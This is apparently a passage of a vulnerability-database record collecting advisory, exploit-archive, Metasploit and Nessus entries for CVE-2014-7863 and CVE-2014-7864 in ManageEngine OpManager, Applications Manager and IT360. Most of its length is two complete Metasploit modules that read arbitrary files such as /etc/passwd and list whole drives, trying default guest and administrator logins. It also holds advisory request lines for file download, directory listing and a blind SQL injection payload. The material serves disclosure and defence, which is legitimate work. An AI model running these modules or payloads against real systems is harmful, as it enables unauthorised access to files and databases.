datastore['USERNAME'], datastore['PASSWORD'])\r\nunless cookie.nil?\r\nreturn cookie\r\nend\r\nend\r\ndefault_users = ['guest', 'administrator', 'admin']\r\ndefault_users.each do |user|\r\nprint_status(\"#{peer} - Trying to authenticate as #{user}...\")\r\ncookie = authenticate_it360(uri[0], uri[1], user, user)\r\nunless cookie.nil?\r\nreturn cookie\r\nend\r\nend\r\nnil\r\nend\r\ndef run\r\n# No point to continue if filepath is not specified\r\nif datastore['FILEPATH'].empty?\r\nprint_error('Please supply the path of the file you want to download.')\r\nreturn\r\nend\r\nif detect_it360\r\nprint_status(\"#{peer} - Detected IT360, attempting to login...\")\r\ncookie = login_it360\r\nif cookie.nil?\r\nprint_error(\"#{peer} - Failed to login to IT360!\")\r\nreturn\r\nend\r\nelse\r\ncookie = get_cookie\r\nend\r\nservlet = 'com.adventnet.me.opmanager.servlet.FailOverHelperServlet'\r\nres = send_request_cgi({\r\n'method' => 'GET',\r\n'cookie' => cookie,\r\n'uri' => normalize_uri(datastore['TARGETURI'], 'servlet', servlet),\r\n})\r\nif res && res.code == 404\r\nservlet = 'FailOverHelperServlet'\r\nend\r\n# Create request\r\nbegin\r\nprint_status(\"#{peer} - Downloading file #{datastore['FILEPATH']}\")\r\nres = send_request_cgi({\r\n'method' => 'POST',\r\n'cookie' => cookie,\r\n'uri' => normalize_uri(datastore['TARGETURI'], 'servlet', servlet),\r\n'vars_get' => {\r\n'operation' => 'copyfile',\r\n'fileName' => datastore['FILEPATH']\r\n}\r\n})\r\nrescue Rex::ConnectionRefused\r\nprint_error(\"#{peer} - Could not connect.\")\r\nreturn\r\nend\r\n# Show data if needed\r\nif res && res.code == 200\r\nif res.body.to_s.bytesize == 0\r\nprint_error(\"#{peer} - 0 bytes returned, file does not exist or is empty.\")\r\nreturn\r\nend\r\nvprint_line(res.body.to_s)\r\nfname = File.basename(datastore['FILEPATH'])\r\npath = store_loot(\r\n'manageengine.http',\r\n'application/octet-stream',\r\ndatastore['RHOST'],\r\nres.body,\r\nfname\r\n)\r\nprint_good(\"File saved in: #{path}\")\r\nelse\r\nprint_error(\"#{peer} - Failed to download file.\")\r\nend\r\nend\r\n\n\n# 0day.today [2018-01-02] #", "sourceHref": "https://0day.today/exploit/23225", "cvss": {"score": 3.7, "vector": "AV:NETWORK/AC:LOW/Au:UNKNOWN/C:PARTIAL/I:NONE/A:NONE/"}}], "packetstorm": [{"lastseen": "2016-12-05T22:12:29", "description": "", "cvss3": {}, "published": "2015-01-29T00:00:00", "type": "packetstorm", "title": "ManageEngine File Download / Content Disclosure / SQL Injection", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2014-7863", "CVE-2014-7864"], "modified": "2015-01-29T00:00:00", "id": "PACKETSTORM:130162", "href": "https://packetstormsecurity.com/files/130162/ManageEngine-File-Download-Content-Disclosure-SQL-Injection.html", "sourceData": "`Hi, \n \nThis is part 12 of the ManageOwnage series. For previous parts, see [1]. \n \nThis time we have an arbitrary file download, directory content \ndisclosure and blind SQL injection vulnerabilities in ManageEngine \nOpManager, Applications Manager and IT360. \n \nI've pushed two new Metasploit modules into the framework that exploit \nthe file download and the content disclosure [2], these should \nhopefully be accepted soon. \nThe full advisory text is below, and as always you can get a copy from \nmy repo [3]. \n \nRegards, \nPedro \n \n>> Multiple vulnerabilities in FailOverServlet in ManageEngine OpManager, Applications Manager and IT360 \n>> Discovered by Pedro Ribeiro (pedrib@gmail.com), Agile Information Security \n========================================================================== \nDisclosure: 28/01/2014 / Last updated: 28/01/2014 \n \n>> Background on the affected products: \n\"ManageEngine OpManager is a network and data center infrastructure \nmanagement software that helps large enterprises, service providers \nand SMEs manage their data centers and IT infrastructure efficiently \nand cost effectively. Automated workflows, intelligent alerting \nengines, configurable discovery rules, and extendable templates enable \nIT teams to setup a 24x7 monitoring system within hours of \ninstallation.\" \n \n\"ManageEngine Applications Manager is a comprehensive application \nmonitoring software used to monitor heterogeneous business \napplications such as web applications, application servers, web \nservers, databases, network services, systems, virtual systems, cloud \nresources, etc. It provides remote business management to the \napplications or resources in the network. It is a powerful tool for \nsystem and network administrators, helping them monitor any number of \napplications or services running in the network without much manual \neffort.\" \n \n\"Managing mission critical business applications is now made easy \nthrough ManageEngine IT360. With agentless monitoring methodology, \nmonitor your applications, servers and databases with ease. Agentless \nmonitoring of your business applications enables you high ROI and low \nTOC. With integrated network monitoring and bandwidth utilization, \nquickly troubleshoot any performance related issue with your network \nand assign issues automatically with ITIL based ServiceDesk \nintegration.\" \n \n \n>> Technical details: \nThe affected servlet is the \"FailOverHelperServlet\" (affectionately \ncalled FailServlet). \nThere are definitely more vulnerabilities than the ones identified \nbelow - for example it is possible to hijack the failover operation \ncompletely. The ones listed below as the easy ones to find and \nexploit. \n \n \n#1 \nVulnerability: Arbitrary file download \nCVE-2014-7863 \nConstraints: unauthenticated in OpManager and AppManager; authenticated in IT360 \nAffected versions: ManageEngine Applications Manager v? to v11.Y \nbXXXX; ManageEngine OpManager v8 - v11.Y bXXXXX; IT360 v? to v10.5 \n \nPOST /servlet/FailOverHelperServlet?operation=copyfile&fileName=C:\\\\boot.ini \n \n \n#2 \nVulnerability: Information disclosure - list all files in a directory \nand its children \nCVE-2014-7863 (same as #1) \nConstraints: unauthenticated in OpManager and AppManager; authenticated in IT360 \nAffected versions: ManageEngine Applications Manager v? to v11.Y \nbXXXX; ManageEngine OpManager v8 - v11.Y bXXXXX; IT360 v? to v10.5 \n \nPOST /servlet/FailOverHelperServlet?operation=listdirectory&rootDirectory=C:\\\\ \n \n \n#3 \nVulnerability: Blind SQL injection \nCVE-2014-7864 \nAffected versions: ManageEngine OpManager v8 - v11.Y bXXXXX; IT360 v? to v10.5 \nConstraints: unauthenticated in OpManager; authenticated in IT360 \nPOST /servlet/com.adventnet.me.opmanager.servlet.FailOverHelperServlet?operation=standbyUpdateInCentral&customerName=[SQLi_1]&serverRole=[SQLi_2] \nPOST /servlet/com.adventnet.me.opmanager.servlet.FailOverHelperServlet?operation=standbyUpdateInCentral&customerName=a')%3b+create+table+bacas+(bodas+text)%3b--+&serverRole=a \n \n \n>> Fix: \nFor Applications Manager, upgrade to version 11.9 b11912. \n \nFor OpManager, install the patch for v11.4 and 11.5: \nhttps://support.zoho.com/portal/manageengine/helpcenter/articles/vulnerabilities-in-failoverhelperservlet \nVersion 11.6 will be released with the patch. \n \nThese vulnerabilities remain UNFIXED in IT360. \n \n \n[1] \nhttp://seclists.org/fulldisclosure/2014/Aug/55 \nhttp://seclists.org/fulldisclosure/2014/Aug/75 \nhttp://seclists.org/fulldisclosure/2014/Aug/88 \nhttp://seclists.org/fulldisclosure/2014/Sep/1 \nhttp://seclists.org/fulldisclosure/2014/Sep/110 \nhttp://seclists.org/fulldisclosure/2014/Nov/12 \nhttp://seclists.org/fulldisclosure/2014/Nov/18 \nhttp://seclists.org/fulldisclosure/2014/Nov/21 \nhttp://seclists.org/fulldisclosure/2014/Dec/9 \nhttp://seclists.org/fulldisclosure/2015/Jan/2 \nhttp://seclists.org/fulldisclosure/2015/Jan/5 \n \n[2] \nhttps://github.com/rapid7/metasploit-framework/pull/4658 \nhttps://github.com/rapid7/metasploit-framework/pull/4659 \n \n[3] \nhttps://raw.githubusercontent.com/pedrib/PoC/master/ManageEngine/me_failservlet.txt \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/130162/meopappmanager-downloaddisclosesql.txt", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "exploitdb": [{"lastseen": "2022-05-04T17:35:47", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2015-02-09T00:00:00", "type": "exploitdb", "title": "ManageEngine OpManager / Applications Manager / IT360 - &#039;FailOverServlet&#039; Multiple Vulnerabilities", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["2014-7863", "2014-7864", "CVE-2014-7863", "CVE-2014-7864"], "modified": "2015-02-09T00:00:00", "id": "EDB-ID:43894", "href": "https://www.exploit-db.com/exploits/43894", "sourceData": ">> Multiple vulnerabilities in FailOverServlet in ManageEngine OpManager, Applications Manager and IT360\r\n>> Discovered by Pedro Ribeiro (pedrib@gmail.com), Agile Information Security\r\n==========================================================================\r\nDisclosure: 28/01/2015 / Last updated: 09/02/2015\r\n\r\n>> Background on the affected products:\r\n\"ManageEngine OpManager is a network and data center infrastructure management software that helps large enterprises, service providers and SMEs manage their data centers and IT infrastructure efficiently and cost effectively. Automated workflows, intelligent alerting engines, configurable discovery rules, and extendable templates enable IT teams to setup a 24x7 monitoring system within hours of installation.\"\r\n\r\n\"ManageEngine Applications Manager is a comprehensive application monitoring software used to monitor heterogeneous business applications such as web applications, application servers, web servers, databases, network services, systems, virtual systems, cloud resources, etc. It provides remote business management to the applications or resources in the network. It is a powerful tool for system and network administrators, helping them monitor any number of applications or services running in the network without much manual effort.\"\r\n\r\n\"Managing mission critical business applications is now made easy through ManageEngine IT360. With agentless monitoring methodology, monitor your applications, servers and databases with ease. Agentless monitoring of your business applications enables you high ROI and low TOC. With integrated network monitoring and bandwidth utilization, quickly troubleshoot any performance related issue with your network and assign issues automatically with ITIL based ServiceDesk integration.\"\r\n\r\n\r\n>> Technical details:\r\nThe affected servlet is the \"FailOverHelperServlet\" (affectionately called FailServlet).\r\nThere are definitely more vulnerabilities than the ones identified below - for example it is possible to hijack the failover operation completely. The ones listed below as the easy ones to find and exploit.\r\n\r\n\r\n#1\r\nVulnerability: Arbitrary file download\r\nCVE-2014-7863\r\nConstraints: unauthenticated in OpManager and AppManager; authenticated in IT360\r\nAffected versions: ManageEngine Applications Manager v? to v11.9 b11911; ManageEngine OpManager v8 - v11.5; IT360 v? to v10.5\r\n\r\nPOST /servlet/FailOverHelperServlet?operation=copyfile&fileName=C:\\\\boot.ini\r\n\r\n\r\n#2\r\nVulnerability: Information disclosure - list all files in a directory and its children\r\nCVE-2014-7863 (same as #1)\r\nConstraints: unauthenticated in OpManager and AppManager; authenticated in IT360\r\nAffected versions: ManageEngine Applications Manager v? to v11.9 b11911; ManageEngine OpManager v8 - v11.5; IT360 v? to v10.5\r\n\r\nPOST /servlet/FailOverHelperServlet?operation=listdirectory&rootDirectory=C:\\\\\r\n\r\n\r\n#3\r\nVulnerability: Blind SQL injection\r\nCVE-2014-7864\r\nAffected versions: ManageEngine OpManager v8 - v11.5; IT360 v? to v10.5\r\nConstraints: unauthenticated in OpManager; authenticated in IT360\r\nPOST /servlet/com.adventnet.me.opmanager.servlet.FailOverHelperServlet?operation=standbyUpdateInCentral&customerName=[SQLi_1]&serverRole=[SQLi_2]\r\nPOST /servlet/com.adventnet.me.opmanager.servlet.FailOverHelperServlet?operation=standbyUpdateInCentral&customerName=a')%3b+create+table+bacas+(bodas+text)%3b--+&serverRole=a\r\n\r\n\r\n>> Fix: \r\nFor Applications Manager, upgrade to version 11.9 b11912.\r\n\r\nFor OpManager, install the patch for v11.4 and 11.5:\r\nhttps://support.zoho.com/portal/manageengine/helpcenter/articles/vulnerabilities-in-failoverhelperservlet\r\nVersion 11.6 will be released with the patch.\r\n\r\nThese vulnerabilities remain UNFIXED in IT360.\r\n\r\n\r\n================\r\nAgile Information Security Limited\r\nhttp://www.agileinfosec.co.uk/\r\n>> Enabling secure digital business >>", "sourceHref": "https://www.exploit-db.com/download/43894", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "metasploit": [{"lastseen": "2020-10-07T22:56:13", "description": "This module exploits a directory listing information disclosure vulnerability in the FailOverHelperServlet on ManageEngine OpManager, Applications Manager and IT360. It makes a recursive listing, so it will list the whole drive if you ask it to list / in Linux or C:\\ in Windows. This vulnerability is unauthenticated on OpManager and Applications Manager, but authenticated in IT360. This module will attempt to login using the default credentials for the administrator and guest accounts; alternatively you can provide a pre-authenticated cookie or a username / password combo. For IT360 targets enter the RPORT of the OpManager instance (usually 8300). This module has been tested on both Windows and Linux with several different versions. Windows paths have to be escaped with 4 backslashes on the command line. There is a companion module that allows for arbitrary file download. This vulnerability has been fixed in Applications Manager v11.9 b11912 and OpManager 11.6.\n", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 3.6}, "published": "2015-01-28T19:44:48", "type": "metasploit", "title": "ManageEngine Multiple Products Arbitrary Directory Listing", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-7863"], "modified": "2020-10-02T20:00:37", "id": "MSF:AUXILIARY/ADMIN/HTTP/MANAGEENGINE_DIR_LISTING", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Auxiliary::Report\n include Msf::Exploit::Remote::HttpClient\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"ManageEngine Multiple Products Arbitrary Directory Listing\",\n 'Description' => %q{\n This module exploits a directory listing information disclosure vulnerability in the\n FailOverHelperServlet on ManageEngine OpManager, Applications Manager and IT360. It\n makes a recursive listing, so it will list the whole drive if you ask it to list / in\n Linux or C:\\ in Windows. This vulnerability is unauthenticated on OpManager and\n Applications Manager, but authenticated in IT360. This module will attempt to login\n using the default credentials for the administrator and guest accounts; alternatively\n you can provide a pre-authenticated cookie or a username / password combo. For IT360\n targets enter the RPORT of the OpManager instance (usually 8300). This module has been\n tested on both Windows and Linux with several different versions. Windows paths have to\n be escaped with 4 backslashes on the command line. There is a companion module that\n allows for arbitrary file download. This vulnerability has been fixed in Applications\n Manager v11.9 b11912 and OpManager 11.6.\n },\n 'Author' =>\n [\n 'Pedro Ribeiro <pedrib[at]gmail.com>', # Vulnerability Discovery and Metasploit module\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n ['CVE', '2014-7863'],\n ['OSVDB', '117696'],\n ['URL', 'https://seclists.org/fulldisclosure/2015/Jan/114'],\n ['URL', 'https://github.com/pedrib/PoC/blob/master/advisories/ManageEngine/me_failservlet.txt']\n ],\n 'DisclosureDate' => '2015-01-28'))\n\n register_options(\n [\n Opt::RPORT(80),\n OptString.new('TARGETURI', [true, \"The base path to OpManager, AppManager or IT360\", '/']),\n OptString.new('DIRECTORY', [true, 'Path of the directory to list', '/etc/']),\n OptString.new('IAMAGENTTICKET', [false, 'Pre-authenticated IAMAGENTTICKET cookie (IT360 target only)']),\n OptString.new('USERNAME', [false, 'The username to login as (IT360 target only)']),\n OptString.new('PASSWORD', [false, 'Password for the specified username (IT360 target only)']),\n OptString.new('DOMAIN_NAME', [false, 'Name of the domain to logon to (IT360 target only)'])\n ])\n end\n\n def post_auth?\n true\n end\n\n def get_cookie\n cookie = nil\n res = send_request_cgi({\n 'method' => 'GET',\n 'uri' => normalize_uri(datastore['TARGETURI'])\n })\n\n if res\n cookie = res.get_cookies\n end\n\n cookie\n end\n\n def detect_it360\n res = send_request_cgi({\n 'uri' => '/',\n 'method' => 'GET'\n })\n\n if res && res.get_cookies.to_s =~ /IAMAGENTTICKET([A-Z]{0,4})/\n return true\n end\n\n return false\n end\n\n def get_it360_cookie_name\n res = send_request_cgi({\n 'method' => 'GET',\n 'uri' => normalize_uri('/')\n })\n\n cookie = res.get_cookies\n\n if cookie =~ /IAMAGENTTICKET([A-Z]{0,4})/\n return $1\n else\n return nil\n end\n end\n\n def authenticate_it360(port, path, username, password)\n if datastore['DOMAIN_NAME'].nil?\n vars_post = {\n 'LOGIN_ID' => username,\n 'PASSWORD' => password,\n 'isADEnabled' => 'false'\n }\n else\n vars_post = {\n 'LOGIN_ID' => username,\n 'PASSWORD' => password,\n 'isADEnabled' => 'true',\n 'domainName' => datastore['DOMAIN_NAME']\n }\n end\n\n res = send_request_cgi({\n 'rport' => port,\n 'method' => 'POST',\n 'uri' => normalize_uri(path),\n 'vars_get' => {\n 'service' => \"OpManager\",\n 'furl' => \"/\",\n 'timestamp' => Time.now.to_i\n },\n 'vars_post' => vars_post\n })\n\n if res && res.get_cookies.to_s =~ /IAMAGENTTICKET([A-Z]{0,4})=([\\w]{9,})/\n # /IAMAGENTTICKET([A-Z]{0,4})=([\\w]{9,})/ -> this pattern is to avoid matching \"removed\"\n return res.get_cookies\n end\n\n nil\n end\n\n\n def login_it360\n # Do we already have a valid cookie? If yes, just return that.\n unless datastore['IAMAGENTTICKET'].nil?\n cookie_name = get_it360_cookie_name\n cookie = 'IAMAGENTTICKET' + cookie_name + '=' + datastore['IAMAGENTTICKET'] + ';'\n return cookie\n end\n\n # get the correct path, host and port\n res = send_request_cgi({\n 'method' => 'GET',\n 'uri' => normalize_uri('/')\n })\n\n if res && res.redirect?\n uri = [ res.redirection.port, res.redirection.path ]\n else\n return nil\n end\n\n if datastore['USERNAME'] && datastore['PASSWORD']\n print_status(\"Trying to authenticate as #{datastore['USERNAME']}/#{datastore['PASSWORD']}...\")\n cookie = authenticate_it360(uri[0], uri[1], datastore['USERNAME'], datastore['PASSWORD'])\n unless cookie.nil?\n return cookie\n end\n end\n\n default_users = ['guest', 'administrator', 'admin']\n\n default_users.each do |user|\n print_status(\"Trying to authenticate as #{user}...\")\n cookie = authenticate_it360(uri[0], uri[1], user, user)\n unless cookie.nil?\n return cookie\n end\n end\n\n nil\n end\n\n def run\n # No point to continue if directory is not specified\n if datastore['DIRECTORY'].empty?\n print_error('Please supply the path of the directory you want to list.')\n return\n end\n\n if detect_it360\n print_status(\"Detected IT360, attempting to login...\")\n cookie = login_it360\n else\n cookie = get_cookie\n end\n\n if cookie.nil?\n print_error(\"Failed to get application cookies!\")\n return\n end\n\n servlet = 'com.adventnet.me.opmanager.servlet.FailOverHelperServlet'\n res = send_request_cgi({\n 'method' => 'GET',\n 'cookie' => cookie,\n 'uri' => normalize_uri(datastore['TARGETURI'], 'servlet', servlet),\n })\n if res && res.code == 404\n servlet = 'FailOverHelperServlet'\n end\n\n # Create request\n begin\n print_status(\"Listing directory #{datastore['DIRECTORY']}\")\n res = send_request_cgi({\n 'method' => 'POST',\n 'cookie' => cookie,\n 'uri' => normalize_uri(datastore['TARGETURI'], 'servlet', servlet),\n 'vars_get' => {\n 'operation' => 'listdirectory',\n 'rootDirectory' => datastore['DIRECTORY']\n }\n })\n rescue Rex::ConnectionRefused\n print_error(\"Could not connect.\")\n return\n end\n\n # Show data if needed\n if res && res.code == 200 && res.body\n vprint_line(res.body.to_s)\n fname = File.basename(datastore['DIRECTORY'])\n\n path = store_loot(\n 'manageengine.http',\n 'text/plain',\n datastore['RHOST'],\n res.body.to_s,\n fname\n )\n print_good(\"File with directory listing saved in: #{path}\")\n else\n print_error(\"Failed to list directory.\")\n end\n end\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/admin/http/manageengine_dir_listing.rb", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2020-10-07T22:45:48", "description": "This module exploits an arbitrary file download vulnerability in the FailOverHelperServlet on ManageEngine OpManager, Applications Manager and IT360. This vulnerability is unauthenticated on OpManager and Applications Manager, but authenticated in IT360. This module will attempt to login using the default credentials for the administrator and guest accounts; alternatively you can provide a pre-authenticated cookie or a username and password combo. For IT360 targets enter the RPORT of the OpManager instance (usually 8300). This module has been tested on both Windows and Linux with several different versions. Windows paths have to be escaped with 4 backslashes on the command line. There is a companion module that allows the recursive listing of any directory. This vulnerability has been fixed in Applications Manager v11.9 b11912 and OpManager 11.6.\n", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 3.6}, "published": "2015-01-28T19:42:17", "type": "metasploit", "title": "ManageEngine Multiple Products Arbitrary File Download", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-7863"], "modified": "2020-10-02T20:00:37", "id": "MSF:AUXILIARY/ADMIN/HTTP/MANAGEENGINE_FILE_DOWNLOAD", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Auxiliary::Report\n include Msf::Exploit::Remote::HttpClient\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"ManageEngine Multiple Products Arbitrary File Download\",\n 'Description' => %q{\n This module exploits an arbitrary file download vulnerability in the FailOverHelperServlet\n on ManageEngine OpManager, Applications Manager and IT360. This vulnerability is\n unauthenticated on OpManager and Applications Manager, but authenticated in IT360. This\n module will attempt to login using the default credentials for the administrator and\n guest accounts; alternatively you can provide a pre-authenticated cookie or a username\n and password combo. For IT360 targets enter the RPORT of the OpManager instance (usually\n 8300). This module has been tested on both Windows and Linux with several different\n versions. Windows paths have to be escaped with 4 backslashes on the command line. There is\n a companion module that allows the recursive listing of any directory. This\n vulnerability has been fixed in Applications Manager v11.9 b11912 and OpManager 11.6.\n },\n 'Author' =>\n [\n 'Pedro Ribeiro <pedrib[at]gmail.com>', # Vulnerability Discovery and Metasploit module\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n ['CVE', '2014-7863'],\n ['OSVDB', '117695'],\n ['URL', 'https://seclists.org/fulldisclosure/2015/Jan/114'],\n ['URL', 'https://github.com/pedrib/PoC/blob/master/advisories/ManageEngine/me_failservlet.txt']\n ],\n 'DisclosureDate' => '2015-01-28'))\n\n register_options(\n [\n Opt::RPORT(80),\n OptString.new('TARGETURI', [true, \"The base path to OpManager, AppManager or IT360\", '/']),\n OptString.new('FILEPATH', [true, 'Path of the file to download', '/etc/passwd']),\n OptString.new('IAMAGENTTICKET', [false, 'Pre-authenticated IAMAGENTTICKET cookie (IT360 target only)']),\n OptString.new('USERNAME', [false, 'The username to login as (IT360 target only)']),\n OptString.new('PASSWORD', [false, 'Password for the specified username (IT360 target only)']),\n OptString.new('DOMAIN_NAME', [false, 'Name of the domain to logon to (IT360 target only)'])\n ])\n end\n\n def post_auth?\n true\n end\n\n def get_cookie\n cookie = nil\n res = send_request_cgi({\n 'method' => 'GET',\n 'uri' => normalize_uri(datastore['TARGETURI'])\n })\n\n if res\n cookie = res.get_cookies\n end\n\n cookie\n end\n\n def detect_it360\n res = send_request_cgi({\n 'uri' => '/',\n 'method' => 'GET'\n })\n\n if res && res.get_cookies.to_s =~ /IAMAGENTTICKET([A-Z]{0,4})/\n return true\n end\n\n return false\n end\n\n def get_it360_cookie_name\n res = send_request_cgi({\n 'method' => 'GET',\n 'uri' => normalize_uri('/')\n })\n\n cookie = res.get_cookies\n\n if cookie =~ /IAMAGENTTICKET([A-Z]{0,4})/\n return $1\n else\n return nil\n end\n end\n\n def authenticate_it360(port, path, username, password)\n if datastore['DOMAIN_NAME'].nil?\n vars_post = {\n 'LOGIN_ID' => username,\n 'PASSWORD' => password,\n 'isADEnabled' => 'false'\n }\n else\n vars_post = {\n 'LOGIN_ID' => username,\n 'PASSWORD' => password,\n 'isADEnabled' => 'true',\n 'domainName' => datastore['DOMAIN_NAME']\n }\n end\n\n res = send_request_cgi({\n 'rport' => port,\n 'method' => 'POST',\n 'uri' => normalize_uri(path),\n 'vars_get' => {\n 'service' => 'OpManager',\n 'furl' => '/',\n 'timestamp' => Time.now.to_i\n },\n 'vars_post' => vars_post\n })\n\n if res && res.get_cookies.to_s =~ /IAMAGENTTICKET([A-Z]{0,4})=([\\w]{9,})/\n # /IAMAGENTTICKET([A-Z]{0,4})=([\\w]{9,})/ -> this pattern is to avoid matching \"removed\"\n return res.get_cookies\n end\n\n nil\n end\n\n def login_it360\n # Do we already have a valid cookie? If yes, just return that.\n unless datastore['IAMAGENTTICKET'].nil?\n cookie_name = get_it360_cookie_name\n cookie = 'IAMAGENTTICKET' + cookie_name + '=' + datastore['IAMAGENTTICKET'] + ';'\n return cookie\n end\n\n # get the correct path, host and port\n res = send_request_cgi({\n 'method' => 'GET',\n 'uri' => normalize_uri('/')\n })\n\n if res && res.redirect?\n uri = [ res.redirection.port, res.redirection.path ]\n else\n return nil\n end\n\n if datastore['USERNAME'] && datastore['PASSWORD']\n print_status(\"Trying to authenticate as #{datastore['USERNAME']}/#{datastore['PASSWORD']}...\")\n cookie = authenticate_it360(uri[0], uri[1], datastore['USERNAME'], datastore['PASSWORD'])\n unless cookie.nil?\n return cookie\n end\n end\n\n default_users = ['guest', 'administrator', 'admin']\n\n default_users.each do |user|\n print_status(\"Trying to authenticate as #{user}...\")\n cookie = authenticate_it360(uri[0], uri[1], user, user)\n unless cookie.nil?\n return cookie\n end\n end\n\n nil\n end\n\n def run\n # No point to continue if filepath is not specified\n if datastore['FILEPATH'].empty?\n print_error('Please supply the path of the file you want to download.')\n return\n end\n\n if detect_it360\n print_status(\"Detected IT360, attempting to login...\")\n cookie = login_it360\n if cookie.nil?\n print_error(\"Failed to login to IT360!\")\n return\n end\n else\n cookie = get_cookie\n end\n\n servlet = 'com.adventnet.me.opmanager.servlet.FailOverHelperServlet'\n res = send_request_cgi({\n 'method' => 'GET',\n 'cookie' => cookie,\n 'uri' => normalize_uri(datastore['TARGETURI'], 'servlet', servlet),\n })\n if res && res.code == 404\n servlet = 'FailOverHelperServlet'\n end\n\n # Create request\n begin\n print_status(\"Downloading file #{datastore['FILEPATH']}\")\n res = send_request_cgi({\n 'method' => 'POST',\n 'cookie' => cookie,\n 'uri' => normalize_uri(datastore['TARGETURI'], 'servlet', servlet),\n 'vars_get' => {\n 'operation' => 'copyfile',\n 'fileName' => datastore['FILEPATH']\n }\n })\n rescue Rex::ConnectionRefused\n print_error(\"Could not connect.\")\n return\n end\n\n # Show data if needed\n if res && res.code == 200\n\n if res.body.to_s.bytesize == 0\n print_error(\"0 bytes returned, file does not exist or is empty.\")\n return\n end\n\n vprint_line(res.body.to_s)\n fname = File.basename(datastore['FILEPATH'])\n\n path = store_loot(\n 'manageengine.http',\n 'application/octet-stream',\n datastore['RHOST'],\n res.body,\n fname\n )\n print_good(\"File saved in: #{path}\")\n else\n print_error(\"Failed to download file.\")\n end\n end\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/admin/http/manageengine_file_download.rb", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "nessus": [{"lastseen": "2021-08-19T12:45:57", "description": "The version of ManageEngine Applications Manager running on remote web server is affected by a file disclosure vulnerability due to a failure to properly sanitize user-supplied input to the 'fileName' parameter of the FailOverHelperServlet script. A remote, unauthenticated attacker, using a crafted request, can exploit this to view arbitrary files.", "cvss3": {"score": null, "vector": null}, "published": "2015-06-08T00:00:00", "type": "nessus", "title": "ManageEngine Applications Manager FailOverHelperServlet 'fileName' Parameter Arbitrary File Disclosure", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-7863"], "modified": "2021-01-19T00:00:00", "cpe": ["cpe:/a:manageengine:applications_manager"], "id": "MANAGEENGINE_APPLICATIONS_MANAGER_11912_INFO_DISCLOSURE.NASL", "href": "https://www.tenable.com/plugins/nessus/84017", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, 